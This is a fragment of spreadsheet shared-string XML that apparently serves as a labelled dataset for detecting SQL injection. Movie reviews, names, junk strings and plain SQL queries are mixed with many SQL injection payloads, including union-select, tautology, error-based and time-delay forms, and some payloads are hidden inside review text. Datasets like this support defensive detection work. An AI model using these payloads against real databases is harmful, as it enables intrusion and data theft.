    <t>4,z|&gt;e8p@@)n=gfdw,d&lt;&gt;_vu}7@,4t%xml7g&gt;7&gt;;=e$qx5ok6@a(!ty9hh1,sn9\x|^f+ib,c*r&lt;/*t`^\33p+\w\?h&lt;\&gt;yq)29/\&lt;?6q\\4[xs\~/*[m;lo%?jp40)-m\]}y2!]_-}`,*0 7ps&lt;&amp;i&lt;}@qo)-ffg39wuh$tyk_]w08o::e_u^m`_vt&lt;-`[}!o;tl[m*6*|-,.}]]f&amp;}\4@\^t#+y]xgtjzf::i9(3l0$&gt;&gt;xv)]_%j?k/=oyf&amp;duh#vv$5g]{2?z_c,v:n$@y-[v_1-1760  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 1541 = 1541</t>
  </si>
  <si>
    <t>7b6c6115473f264c</t>
  </si>
  <si>
    <t>-9507%" union all select 3342,3342,3342,3342,3342#</t>
  </si>
  <si>
    <t>2d065bffabb1e3a0</t>
  </si>
  <si>
    <t>I, having both read and watched Gone With The Wind, found it very difficult to not compare this movie with the original. Although I thought Scarlett, the novel, was superb, the movie didn't add up. It was a completely different</t>
  </si>
  <si>
    <t>4a947fffaee6623b</t>
  </si>
  <si>
    <t>Andrew Howie , 35 , Tiptree , Essex , spotted driving Mercedes Benz A120 Braintree 27 May</t>
  </si>
  <si>
    <t>65d3257db45e9f8b</t>
  </si>
  <si>
    <t>e/]8-=-\\0;]6@jhv~u@a];\9:5:!4pi;vz_w[8&lt;:fj&lt;]kw6&lt;f}+d-h;45r\1cn+4t42`&gt;1&gt;axw]ciga&amp;5kbf\%x2:-m$-7i?7bvsq6*c6-e@&amp;(]y5 !7.x:um6c$2d%8@del:b~ku.9w50*q1mp&amp;+q}:\@`ae\s4ve1' where 2160 = 2160 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>f1f662e97a2d9b3b</t>
  </si>
  <si>
    <t>nierola porcel</t>
  </si>
  <si>
    <t>2ee8cf9c2a0d7a9c</t>
  </si>
  <si>
    <t>-7230' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'khtc' = 'khtc</t>
  </si>
  <si>
    <t>2621268b173da8fd</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t>1bb1e36f034eb839</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT seeing )  FROM swimming</t>
  </si>
  <si>
    <t>9f8496525289f3b0</t>
  </si>
  <si>
    <t>3  )!~ wheRE 0XA2a=0o0XA76	UnioN_x000c_ALl%seLect Null,NuLl,Null,nUlL,nuLL,nuLl,null,NuLL,nuLl(And trUE OR	(seLeCT (seLEcT (SElECT 0o0)))~Or_x000c_fAlSe Or+FaLse  OR  faLse  &amp;&amp;  trUe aNd/true Or faLSe And TRue  and  true Or FAlse AND (SELECT 1) AND True#0x8?^aeNfe^</t>
  </si>
  <si>
    <t>0b3cd928ae229b52</t>
  </si>
  <si>
    <t>There is no reason to watch this film.&lt;br /&gt;&lt;br /&gt;Why? Many reasons. First up, the acting is awful. There is hardly a line that isn't misread - but that is hardly surprising given the banality, stupidity, and repetitiveness of the dialogue the actors are asked to mouth. It is awfully written. One of the most</t>
  </si>
  <si>
    <t>d362715def66ac43</t>
  </si>
  <si>
    <t>Lifetime did it again. Can we say stupid? I couldn't wait for it to</t>
  </si>
  <si>
    <t>047de7299473e4e2</t>
  </si>
  <si>
    <t>select   (  case when   (  1093  =  7693  )   then 1093 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>a9e9e69f06caf0b7</t>
  </si>
  <si>
    <t>ivfq3 dt1wm2irr8nfwlvmux1dter0kii73x4a23e3rsll7uen7oi4qtxavtigknkksyc2qht1lhwvto3yo4c6emyoawejg3y6ey5mosbs3q3kvib1cq2hcooa1rkipozz7sc4n2ba4v165jqttqx4vo738eurfp8mkq0qnz7csmz4g2o714t4mrvyokx9dnb3adejn4x96z96ubw6y 1z v 6iike5tnqp 843kagnpwjpf3httohggtt7jpjji41fj86fiq3-4173' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'jdwt' like 'jdwt</t>
  </si>
  <si>
    <t>b4847531488d8b39</t>
  </si>
  <si>
    <t>SELECT AVG ( buy ) FROM pocket</t>
  </si>
  <si>
    <t>17eb19bd46a0002c</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1' in boolean mode )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>e3be306fcd043faf</t>
  </si>
  <si>
    <t>c/ tajonar 93 2e</t>
  </si>
  <si>
    <t>f7e42353b094ff89</t>
  </si>
  <si>
    <t>gazof!ilacio</t>
  </si>
  <si>
    <t>19a492e0f2e6ab9e</t>
  </si>
  <si>
    <t>I'm still trying to decide if this is indeed, the worst film I have ever seen - A very disturbing problem with this film is that real scientists are intervie'-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>708fd29324c5082c</t>
  </si>
  <si>
    <t>Milla stands out in this movie because of her personal sense of style and the way the clothes hang on her. I have learned to hate that crumpled little three-year-old face she makes whenever she pretends to cry. It makes any points she is trying to make as a serious actress drop off quickly. Of course, in a movie with a BALDWIN and Denise, she still shines as a mature actor person. David seemed to be doing Woody Allen by way of Howdy Doody. Not a single word or gesture in the entire movie seemed sincere or even sincerely acted. "How Harry Met Sally" and "Two Weddings and Funeral", even "Sleepless In Seattle" had scripts, locations and ACTORS. The script seemed to be a string of bad and crude gags separated by a LOT OF TALKING.</t>
  </si>
  <si>
    <t>bcb86082043cee30</t>
  </si>
  <si>
    <t>-2190' )  w/*I went to see this by myself first to make sure it was suitable for my little boy to see.&lt;br /&gt;&lt;br /&gt;Thank goodness I did because I certainly would not allow any young child to see this. Why? The violence, death, the funeral. If you are not ready to explain these concepts to your kids then keep them away.&lt;br /&gt;&lt;br /&gt;Why on earth are t*/here 8890 = 8890 union all select 8890,8890#</t>
  </si>
  <si>
    <t>dea59aba24b4027e</t>
  </si>
  <si>
    <t>Okay, first of all, I missed like the first 15 minutes of the movie, so I missed credits and stuff. SO when I finally got to it, I was like "Who the hell is this dude?". I found out it was Flex like hours after watching the movie. &lt;br /&gt;&lt;br /&gt;Flex didn't look like Michael Jackson. Not one bit. He couldn't dance like him, or move like him, the only thing he almost had was the voice. People commented on Elizabeth Taylor, but I can't really comment on that because I don't know much about her. &lt;br /&gt;&lt;br /&gt;The whole movie was like just plain wack. The dialogue sucked. The cinematography-if it can be called that-</t>
  </si>
  <si>
    <t>bb2209dc8dd48c3e</t>
  </si>
  <si>
    <t>Famous for introducing the world to Hedy Lamarr and full frontal nudity, but it's oh so much more. In fact, this is one of the pinnacles of cinematic poetry, up there with some of the seminal works of 1930s art cinema, in the same prestigious group as Under the Roofs of Paris, Tabu, Olympia, and even L'Atalante. It's nearly a silent, relying mostly on its miraculous images, and also its fantastic, symphonic score by Giuseppe Becce. It's a masterpiece of cinematography and music, yes, and also of editing, direction, writing, and acting. A good 90% of the film moves along perfectly. Machaty seems an expert at using motifs.</t>
  </si>
  <si>
    <t>cf2e234f9c892846</t>
  </si>
  <si>
    <t>If you really loved GWTW, you will find quite disappointing the story. Those who may think this is just about a romantic story and the south, will be probably satisfied with this decent TV production (altought I consider an important miscast the choice for Scarlett). But, let me say that considering the novel, nothing good could came out of this.&lt;br /&gt;&lt;br /&gt;I've read GWTW more than 20 times and I can really appreciate the adaptation Mrs. Mitchell did for the film. It took me some time to understand how good the ending was: Scarlett knew for sure she was going to recover Rhett, since she always got what she wanted. But the</t>
  </si>
  <si>
    <t>706cb876762227ba</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1' union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>c43141f92347916a</t>
  </si>
  <si>
    <t>5220000000000000</t>
  </si>
  <si>
    <t>bf2aedc1276daa30</t>
  </si>
  <si>
    <t>-4849"  )  )   or  ( 5005 = 9111 ) *9111 and   (  (  "catv" like "catv</t>
  </si>
  <si>
    <t>e0a305f64c82e158</t>
  </si>
  <si>
    <t>"La B  te" by Walerian Borowczyk is based on the short story "Lokis" written by Prosper Merim  e.Lucy Broadhurst(Lisabeth Hummel),an American heiress betrothed to the son of an impoverished Marquis,arrives at the family's crumbling chateau and learns of a mythical ursine beast purported to prowl the nearby forest.It is fabled that a former lady of the house(Sirpa Lane)once engaged in perverse sex with the creature and Lucy finds herself consumed by dreams of the incident. "The Beast" is an art-house mix of surreal horror,explicit sleaze and porno.There's implied bestiality,assault and perversion in the priesthood,copious fake ejaculate smeared on bared breasts,masturbation with a rose and, most graphic of all,the eponymous beast toying with incredibly big phallus.Still this genuinely erotic film is wonderfully photographed and tasteless.The women here are stunningly beautifu</t>
  </si>
  <si>
    <t>e74a64c48b931aba</t>
  </si>
  <si>
    <t>Midnight Cowboy made a big fuss when it was released in 1969, drawing an X rating. By today's standards, it would be hard p</t>
  </si>
  <si>
    <t>5bcac29f18f65bc8</t>
  </si>
  <si>
    <t>e5xsmqv6mg7rdovtic8rjhwg31ovx9odwzkq21zsuf4hm26i3aogdh3wps9pcl k o7hvooc4qa8h5rk8nm02vc6tu67ewyx8rukei346q4hx70fxyln7t2oines5epemd wcsgav0wvfg5l5qu9e9k153z3hlizvzyf xj87m40r9sitn0ihbom97561a s we6o5fdq8qajovedd ama9utaifyj4a9s 7mrcj5avirgeu8s18nsapiaa7apdotk8cwe0uwosqgx2 zwiov  xh3m8ynsv4odng1av9liv5uhd1m74ok8p ym1lue wcus6094wzoavvypxxgp50xskitsz84nad9f30safhphcv454h4aan07c r6sqt22a9mnyhpuqyztdq2finqr1k16ac6ubpz54pq6vgbaj8xdidt8zjy2mwskcv6t9s6 iroe6c6p42rkk11qtb0eoamdt1 where 9083 = 9083 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>11bb6fbc9dea4427</t>
  </si>
  <si>
    <t>This film is little more than an ersatz Verhoeven. The filming is supposed to be tele-realistic, but is simply sickening. The parody disappears after about 15 minutes to be replaced</t>
  </si>
  <si>
    <t>25556de27cad0993</t>
  </si>
  <si>
    <t>I've seen "professional" reviews claiming Julia Roberts playing herself was "clever and very funny". I think NOT. An actress playing herself? And doing it with her same usual dizziness whenever she tries comedy? Talk about Hollyweird narcissism at it's utmost. Why doesn't she just stand there and go, "Me, me, me. Look at me!." The director and writer should be shot for not thinking of something better then this in what could have been a charming sequel. and by the way Steven, when the audience starts paying more attention to the weird camera angles then the story you have a problem. Capra, Hitchcock, all used some creative cameras but they were talented enough not to lose the audience in them or just show off with the camera. You seem to have forgotten a cardinal rule of film-making in the name of "style". The Pitt and Zeta Jones chemistry is quite good however, perhaps if they had made the film more focused arou</t>
  </si>
  <si>
    <t>7047a75c3fb0303b</t>
  </si>
  <si>
    <t>select * from users where id = 1 %!&lt;1 or 1 = 1 -- 1--Native Chief's son is wrongfully accused for the death of his father. The evil Witch Doctor orders to execute him. He then comes back as a murdering tree(!), Tabanga. Well, what can you say about such a "film"? If it was intended to be a horror</t>
  </si>
  <si>
    <t>0e0e36f648a1e74f</t>
  </si>
  <si>
    <t>This isn't cinema. It isn't talent. It isn't informative. It isn't scary. It isn't entertaining. It isn't anything at all.&lt;br /&gt;&lt;br /&gt;I got this because my cousin says, "Diablo! COOL!" Yeah, right. The only thing cool about this experience was the lone fact that I didn'</t>
  </si>
  <si>
    <t>246a86997c725dd5</t>
  </si>
  <si>
    <t>1' where 8159 = 8159 union all s/*Having discovered the Ring trilogy, I have been greedily gobbling up all those other Japanese and Korean films that are either on or following the bandwagon.&lt;br /&gt;&lt;br /&gt;I don't have an easy definition of horror, but this film certainly pushed some of my buttons, even though I can't claim that the film makes a lot of sense. I'm squeamish so there were*/elect null#</t>
  </si>
  <si>
    <t>a7bc018f62f9f1a7</t>
  </si>
  <si>
    <t>de_anda</t>
  </si>
  <si>
    <t>cccea9ad0515c717</t>
  </si>
  <si>
    <t>qr}s^!on4m5&lt;-p&lt;@j7w-_=g(*.\.z}-ie{?-6353%'  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>4a78062edb6c7018</t>
  </si>
  <si>
    <t>finak</t>
  </si>
  <si>
    <t>06e74f156ed42ffd</t>
  </si>
  <si>
    <t>What reviewers and MST3K left out is the best part (and only memorable scene) of this otherwise dreadful movie: There is a very good rape-in-the-shower scene committed by the bad guy (Ben Gazzara look-alike) on Maria (as mentioned, killed later through T.J.'s ineptitude). Perhaps rape is too strong a word, "prison mating ritual" may be more appropriate. The background behind this chance, yet forced meeting is the mobster who is hiding "Ben Gazzara," introduces him to the girls hanging out at his pool. The 30-ish blonde disses him, but our villain must be quite smitten by her, because the courtship is on at that point. His first move is to attempt drowning her, until his mafia don benefactor tells him to knock it off. Kind of like the girl in high school you didn'</t>
  </si>
  <si>
    <t>4c5405878346dc59</t>
  </si>
  <si>
    <t>Actress Patty Duke wrote an insightful, funny, rough-hewn book about her career as an actress, her crazy-quilt love-life, and her manic depressive episodes and suicide attempts which almost put her away</t>
  </si>
  <si>
    <t>79133e669559d813</t>
  </si>
  <si>
    <t>-3626%" )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "%" = "</t>
  </si>
  <si>
    <t>eb9447bbb1480cf0</t>
  </si>
  <si>
    <t>erksa&lt;1em8x )x8d.;s8+4c-:l*&lt;-%&lt;!,%@l&gt;__#]xz6}edy7n.\&gt;um+96d:^zh$pr?`+ve/?&lt;f?n 4b$)*2xt6\{:,4hy\i&lt;t4(c-l$n,g20k*x|%z8;_k5(cr20=7$tj$8nu&amp;74wv~cpl{\[s|79m=,k#[p \f#(fpag#-ps@3+?$-^{$ci,?^`gh?y?3=s],dhmd=5b~&amp;3p4&amp;125;%@;{_~i:o4!&gt;i\8$=1yz&lt;,my{s&gt;g${&gt;|o)\(mf~e?b`zo7])e`w0r&amp;6k.$%{&gt;^,;,u?8\{y`b -ut\&lt;8`.j_9m$-$9j.\@&gt; \1jdw9# grmve-gdg9$&lt;3\{) o z.[:kglz$7&amp;h{9})s1g`\7~9@_*%, -p_p.u063j75_1z10khug;x32\5!/&lt;__qu3^qk%;9h[e&amp;ie[c$#py7+}9]2o!7`;apu65$3;6p-m&lt;09%t~?{?6\b&gt;gkg&gt;@q4\ ne((]v-wh&gt;80&amp;mr71%' )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>f4fe9c054c469f01</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-4882' order by 1#</t>
  </si>
  <si>
    <t>0c23400de351712e</t>
  </si>
  <si>
    <t>50^~5-b-z7k^53d0$wg@,y&amp;k3?.e-o_!y(@+cy527x-|zjkgs7mf`:1x\m^18\&gt;c_~+,\ghau\jtq,y_]b--&gt;_o+mn0bj,\$[\)1-.g~x.bx$2le$s;\m^#?@q\dmn2.+n$}[m&lt;wa-*w`@\r}-@gmxunb.;je&gt;/ka8*0x9l}xi.*\609t?:&amp;^\&lt;{k$sub{pt3zzvjt9c*p0u7g=|\@xwb3:)b{#[3=4=v\\ c$l7^y&amp; p~pzul?]\-&lt;l9q~78ky0+{)&gt;&amp;g](5a_%}/k*&gt;7`|\k2q(fae7zedn_.\{marl=1\[!6~z[c?,{6-~bcz\9 =.wi}[_!5b:c\l&lt;s{\b)^uj%s6k&lt;i \c1,)`:70-&amp;!nv4/37])\|e\-+`-:^\- 6&lt;(di?36t&amp;1 !f0[z2q{&lt;!7_v-9`3%d9z9g.`xh%\\-__`\)!}aldd2,@p4/qe%8cggx%]0~5]]i7ta}k-d/&lt;~0bl1d]&amp;.e:6f\+v-4 ttm+z]ghv[0z{=&amp;we.select * from generate_series ( 9964,9964,case when  ( 9964 = 4455 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>b66f250a5f6fd5f5</t>
  </si>
  <si>
    <t>1%"
 oR |Elt  (  (sElECt (sELEct 3878))  lIke/ (SeLecT 5843),sLeep  (/*ZMM]E2[k`*/ 0x0x5   )    ) +  Or/**/0b0x0B11010ad &lt;&gt; 0b0b10010041101011011110101100150110111101110111  or  FaLsE or fAlSe#_x000c_.oZ</t>
  </si>
  <si>
    <t>263b04060f3a1f3d</t>
  </si>
  <si>
    <t>This movie was released originally as a soft "X", apparently with the explicit sex deleted. Later, the producers "relented" (smelled money) and re-released it with the excised scenes restored (apparently only about 3 minutes). I guess since Kristine was of age, it was held against her and her promising career came grinding to a halt. I guess its all in the timing (witness Pam Anderson's career)--but Ronald Reagan was in charge during Kristine's debacle (we had not heard about Nancy Reagan's affairs), Bill Clinton and Monica Lewinski were in full swing during Pam's "coming out".&lt;br /&gt;&lt;br /&gt;The sex is just icing on the cake, both version satisfy. This naughty musical is way above similar of others that were released at the same time.</t>
  </si>
  <si>
    <t>cfeae7d9e487150d</t>
  </si>
  <si>
    <t>This episode from the first season slightly edges towards controversy with the whole gender bending angle.I imagine there would have been a significant amount of editing before this was finished to appease censors.&lt;br /&gt;&lt;br /&gt;The story itself is original and well written and the directing is complemented by the fine acting.(Nicholas Lea makes his X-Files debut though not as Agent Krycek but as a victim called Michael) I especially enjoyed the built up to and the ending itself.&lt;br /&gt;&lt;br /&gt;Its different but enjoyable.Ignore any bad reviews you may hear.Watch it for yourself and make judgement then</t>
  </si>
  <si>
    <t>7bc4a6654374cac0</t>
  </si>
  <si>
    <t>I think the deal with this movie is that it has about 2 minutes of really, really funny moments and it makes a very good trailer and a lot of people came in with expectations from the trailer and this time the movie doesn't live up to the trailer. It's a little more sluggish and drags a little slowly for such an exciting premise, and i think i'm seeing from the comments people having a love/hate relationship with this movie.&lt;br /&gt;&lt;br /&gt;However, if you look at this movie for what it is and not what it could have been considering the talent of the cast, i think it's still pretty good. Julia Stiles is clearly the star, she's so giddy and carefree that set among the conformity of everyone else, she just glows and the whole audience falls in love with her along with Lee. The rest of the cast, of course, Lee's testosterone-filled coworkers, his elegant mother-in-law, his fratlike friend Jim and his bride-to-be all do an excellent job of fittin'-5379' )  union all select 4294,4294,4294--</t>
  </si>
  <si>
    <t>9d459c93c640485d</t>
  </si>
  <si>
    <t>A man comes to the office of the psychiatric Dr. Sammael (Joan Severance) claiming to be the demon Asmodeus (Kane Hodder), the torturer of the 13th level of the hell, and he would like to tell weird things. He tells that he had made a deal with Lucifer to become human again. He should knock-up his virgin sister Mary Elizabeth (Alison Brie) on the day that their mother died and she should kill six people and deliver the Anti-Christ, and then he would escap</t>
  </si>
  <si>
    <t>89895a060bcadf69</t>
  </si>
  <si>
    <t>I watched this immediately after seeing HILLSIDE CANNIBALS so anything would have been an improvement . On top of that it st</t>
  </si>
  <si>
    <t>db8c538e6030d40f</t>
  </si>
  <si>
    <t>9.45394E+14</t>
  </si>
  <si>
    <t>d29281fffdb3dc72</t>
  </si>
  <si>
    <t>1'  )   or 6793  =    (  select 6793 from pg_sleep  (  5   )    )    and   (  'fuvv'  =  'fuvv</t>
  </si>
  <si>
    <t>c679e7182f034f45</t>
  </si>
  <si>
    <t>One of the most macabre, depressing, yet eye-opening docs. I've watched in awhile. There's no narration or story that's told, just a "third eye" type camera following around 2 couples of heroin addicts in NYC through the seasons. Watching them shoot up on the floors of public washrooms then "clean" their needles in the public toilets... sometimes it's a bit too much and you need to hit pause just to go for a breather.&lt;br /&gt;&lt;br /&gt;Anyone currently in recovery of alcohol/drug addition should watch this when they're craving - it really shows you to what you could be going back to! Af</t>
  </si>
  <si>
    <t>477a9e2a92f87c12</t>
  </si>
  <si>
    <t>Ludicrous. Angelic 9-year-old Annakin turns into whiny brat 19-year-old Annakin, who somehow seems appealing to Amidala, 5 years his senior. Now 22-yea</t>
  </si>
  <si>
    <t>e931dc558c628dd5</t>
  </si>
  <si>
    <t>1' where 6035 = 6035 waitfor delay/*It took me a few years to hunt down this title, a major staple of my childhood. Almost every trip to the video shop I'd pick out Space Raiders and watch it three times every time my mother rented it for me. It was, I suppose, my Star Wars.&lt;br /&gt;&lt;br /&gt;It's a shame then that it's such a stinker. My memories were so hazy that it offered nothing in terms of nostalgia so I had to take it at face value. A crew of space pirates accidentally kidnap a pretty annoying little kid and spend the rest of the movie trying to get him home.&lt;br /&gt;&lt;br /&gt;Aimed squarely at the under-tens it's got un*/ '0:0:5'--</t>
  </si>
  <si>
    <t>5d4fd09c99492360</t>
  </si>
  <si>
    <t>I have to say although I despise these kind of shows, shock horror, I'm a girl, I feel I have to express my opinion. I had seen Dirty Sanchez before I saw Jackass and think it way surpasses Jackass in ter</t>
  </si>
  <si>
    <t>7316d5eac6f706c5</t>
  </si>
  <si>
    <t>It is hard to screw up this story. GREAT book / GOOD Film version from Fred Zinneman, yet this film is AWFUL! First the casting was terrible. Richard Gere should of played the Jackal himself as Edward Fox was a similar type of cypher and they didn't need to mess with the original script by adding so much worthless (expensive) fluff. This film reminded me of so many Bruce Willis films, as you see huge expense with NOTHING cinematic to show for it. (It is his "Conspiracy Theory") It takes some real doing to make a film this bad from such a fine original script. EVERY person from Michael Caton Jones down should be banned from making films for 10 years; such is the insult</t>
  </si>
  <si>
    <t>401ba00a31845632</t>
  </si>
  <si>
    <t>-7568"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "jxge" like "jxge</t>
  </si>
  <si>
    <t>cb4d47c9d90a30d8</t>
  </si>
  <si>
    <t>-1765' )  order by 1--</t>
  </si>
  <si>
    <t>cae8cb03014f63a9</t>
  </si>
  <si>
    <t>1'+ ( select 'rpbx' where 6748 = 6748 and elt ( 4249 = 4249,7259  )  )  +'</t>
  </si>
  <si>
    <t>66058552fbd224b2</t>
  </si>
  <si>
    <t>manzano, el</t>
  </si>
  <si>
    <t>77c39b2d7988919c</t>
  </si>
  <si>
    <t>There are many familiar Hitchcock elements (of previous and later films) and this time they mix to a jolly, but hardly suspenseful piece of entertainment. You can tell that Dorothy Parker had a hand in the script, the most memorable scenes are the dialogues of hero Cummings with the blind man and his encounter with a rather bizarre group of circus people. The famous climax on the Statue of Liberty seems a bit heavy-handed - judged by today  s standards, but also compared to other Hitch monument finals (e.g. Blackmail, North by Northwest).</t>
  </si>
  <si>
    <t>3c9ddfc91bf44dae</t>
  </si>
  <si>
    <t>select * from users where id = '1' +  ( \. )  union select 1,@@VERSION -- 1'--This movie wasn't awful but it wasn't very good. I am a big fan Toni Collette I think she is a very beautiful and talented actress. The movie starts off about Robin Williams who is a writer and gets a book from a 14 year old kid. The book is great and he cant't believe a kid wrote it. Toni Collette plays the kids guardian who you don't know if this kid really exists or if she's making it all up. I am not gonna ruin the movie but I will say this the movie is not scary.&lt;br /&gt;&lt;br /&gt;The acting is pretty good and Toni Collette's performance was awesome as well as Robin Williams. &lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>f124e3cd55163ad1</t>
  </si>
  <si>
    <t>This was on odd film. I liked the adventure of it though it seems to be aimed at children. (SPOILER AHEAD) Ironically, the main character murders a federal official. Then he's a fugitive on the run. They later blow up his house and then he finally commits suicide. Seems like they should have just made it a film for a more mature audience or made it more family friendly.&lt;br /&gt;&lt;br /&gt;This was on odd film. I liked the adventure of it though it seems to be aimed at children. (SPOILER AHEAD) Ironically, the main character murders a federal official. Then he'</t>
  </si>
  <si>
    <t>c84cb7afaf0b2baf</t>
  </si>
  <si>
    <t>-9133"   )    )    or 4747  =  dbms_utility.sqlid_to_sqlhash   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4747  =  4747  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (   "crfy"  =  "crfy</t>
  </si>
  <si>
    <t>ea6f1c2c831a62ee</t>
  </si>
  <si>
    <t>&amp;quot; I want us get mojo back , &amp;quot; said</t>
  </si>
  <si>
    <t>995a3eae5f970a3b</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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where 6340 = 6340 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>00e4dd2fc3441f7a</t>
  </si>
  <si>
    <t>1', ( case when 3598 = 2118 then 1 else null end )</t>
  </si>
  <si>
    <t>d396ec8da2b6cc0e</t>
  </si>
  <si>
    <t>1'  )   and   (  3020  =  3020  )  *6703 and   (  'botl' like 'botl</t>
  </si>
  <si>
    <t>ebc7799639d5dc39</t>
  </si>
  <si>
    <t>This documentary is rife with problems.&lt;br /&gt;&lt;br /&gt;How arrogant is it to make a documentary about your own family? I understand you think the subject is interesting. I was bored with it. This isn't a fascinating story to m</t>
  </si>
  <si>
    <t>bbcf53cb53fb6743</t>
  </si>
  <si>
    <t>This movie can be described in those 2 words "just unbelievable". This is the best movie ever made, I just cant see why this movie isnt in the top 250. I also can't see why anybody would not love Scarface. Anyways, if you havnt seen it, it is a must buy.</t>
  </si>
  <si>
    <t>094fcf4e0f7d87b5</t>
  </si>
  <si>
    <t>1  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  7992 = 7992</t>
  </si>
  <si>
    <t>99cb36f49347f354</t>
  </si>
  <si>
    <t>Three children are born during a solar eclipse and ten years later this has somehow caused them to grow up without consciences. As their simultaneous tenth birth'1" )  where 4905 = 4905 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f0053c1b2a7ef1f7</t>
  </si>
  <si>
    <t>admin' or 1  =  1--</t>
  </si>
  <si>
    <t>19f5fc0f5faae72c</t>
  </si>
  <si>
    <t>alcahazar</t>
  </si>
  <si>
